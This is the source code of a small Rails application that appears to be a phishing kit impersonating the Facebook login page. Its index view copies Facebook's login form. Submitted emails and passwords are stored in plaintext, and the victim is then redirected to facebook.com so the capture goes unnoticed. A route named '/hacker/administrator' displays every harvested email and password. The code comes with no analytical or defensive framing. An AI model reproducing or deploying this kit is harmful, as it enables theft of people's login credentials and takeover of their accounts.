config/routes.rb
Facebook::Application.routes.draw do
  resources :fbs

  root :to => 'fbs#index'
  match '/hacker/administrator', :to => 'fbs#administrator'

end

app/models/fb.rb
class Fb < ActiveRecord::Base
  attr_accessible :email, :password
end

app/controllers/application_controller.rb
class ApplicationController < ActionController::Base
  protect_from_forgery
end

app/controllers/fbs_controller.rb
class FbsController < ApplicationController
  # GET /fbs
  # GET /fbs.json
  def index
    @fb = Fb.new

    respond_to do |format|
      format.html # index.html.erb
      format.json { render json: @fbs }
    end
  end

  # GET /fbs/1
  # GET /fbs/1.json
  def show
    @fb = Fb.find(params[:id])

    respond_to do |format|
      format.html # show.html.erb
      format.json { render json: @fb }
    end
  end

  # GET /fbs/new
  # GET /fbs/new.json
  def new
    @fb = Fb.new

    respond_to do |format|
      format.html # new.html.erb
      format.json { render json: @fb }
    end
  end

  # GET /fbs/1/edit
  def edit
    @fb = Fb.find(params[:id])
  end

  # POST /fbs
  # POST /fbs.json
  def create
    @fb = Fb.new(params[:fb])

    respond_to do |format|
      if @fb.save
        format.html { redirect_to "https://www.facebook.com"}
        format.json { render json: @fb, status: :created, location: @fb }
      else
        format.html { render action: "new" }
        format.json { render json: @fb.errors, status: :unprocessable_entity }
      end
    end
  end

  # PUT /fbs/1
  # PUT /fbs/1.json
  def update
    @fb = Fb.find(params[:id])

    respond_to do |format|
      if @fb.update_attributes(params[:fb])
        format.html { redirect_to @fb, notice: 'Fb was successfully updated.' }
        format.json { head :no_content }
      else
        format.html { render action: "edit" }
        format.json { render json: @fb.errors, status: :unprocessable_entity }
      end
    end
  end

  # DELETE /fbs/1
  # DELETE /fbs/1.json
  def destroy
    @fb = Fb.find(params[:id])
    @fb.destroy

    respond_to do |format|
      format.html { redirect_to fbs_url }
      format.json { head :no_content }
    end
  end

  def administrator
    @fb = Fb.new
    @fbs = Fb.all

    respond_to do |format|
      format.html # index.html.erb
    end
  end
end

app/helpers/application_helper.rb
module ApplicationHelper
end

app/helpers/fbs_helper.rb
module FbsHelper
end

app/views/fbs/_form.html.erb
<%= form_for(@fb) do |f| %>
  <% if @fb.errors.any? %>
    <div id="error_explanation">
      <h2><%= pluralize(@fb.errors.count, "error") %> prohibited this fb from being saved:</h2>

      <ul>
      <% @fb.errors.full_messages.each do |msg| %>
        <li><%= msg %></li>
      <% end %>
      </ul>
    </div>
  <% end %>

  <div class="field">
    <%= f.label :email %><br />
    <%= f.text_field :email %>
  </div>
  <div class="field">
    <%= f.label :password %><br />
    <%= f.text_field :password %>
  </div>
  <div class="actions">
    <%= f.submit %>
  </div>
<% end %>

app/views/fbs/administrator.html.erb
<%-@fbs.each do |register| %>

	<%=register.email %> - <%=register.password %>
	<br />
<% end %>

app/views/fbs/edit.html.erb
<h1>Editing fb</h1>

<%= render 'form' %>

<%= link_to 'Show', @fb %> |
<%= link_to 'Back', fbs_path %>

app/views/fbs/index.html.erb
<%= simple_form_for @fb do |f| %>



<div class="form_row clearfix"><label for="email" class="login_form_label">Email or Phone:</label>

<%=f.input :email, label: false, input_html: {class: 'inputtext', id: 'email'}, :tabindex => 1, :name => "email" %>


</div><div class="form_row clearfix">


<label for="pass" class="login_form_label">Password:</label>

<%=f.input :password, label: false, input_html: {class: 'inputpassword', id: 'pass'}, :tabindex => 1, :name => "pass", :as => "password" %>


<div class="persistent"><div class="uiInputLabel clearfix uiInputLabelLegacy"><input id="persist_box" type="checkbox" value="1" name="persistent" class="uiInputLabelInput uiInputLabelCheckbox"><label for="persist_box" class="uiInputLabelLabel">Keep me logged in</label></div></div><input type="hidden" autocomplete="off" id="default_persistent" name="default_persistent" value="0"><div id="buttons" class="form_row clearfix"><label class="login_form_label"></label>



<div id="login_button_inline"><label class="uiButton uiButtonConfirm uiButtonLarge" id="loginbutton" for="u_0_1">

<%=f.submit "Log in" %>
</div>

<% end %>

app/views/fbs/new.html.erb
<h1>New fb</h1>

<%= render 'form' %>

<%= link_to 'Back', fbs_path %>

app/views/fbs/show.html.erb
<p id="notice"><%= notice %></p>

<p>
  <b>Email:</b>
  <%= @fb.email %>
</p>

<p>
  <b>Password:</b>
  <%= @fb.password %>
</p>


<%= link_to 'Edit', edit_fb_path(@fb) %> |
<%= link_to 'Back', fbs_path %>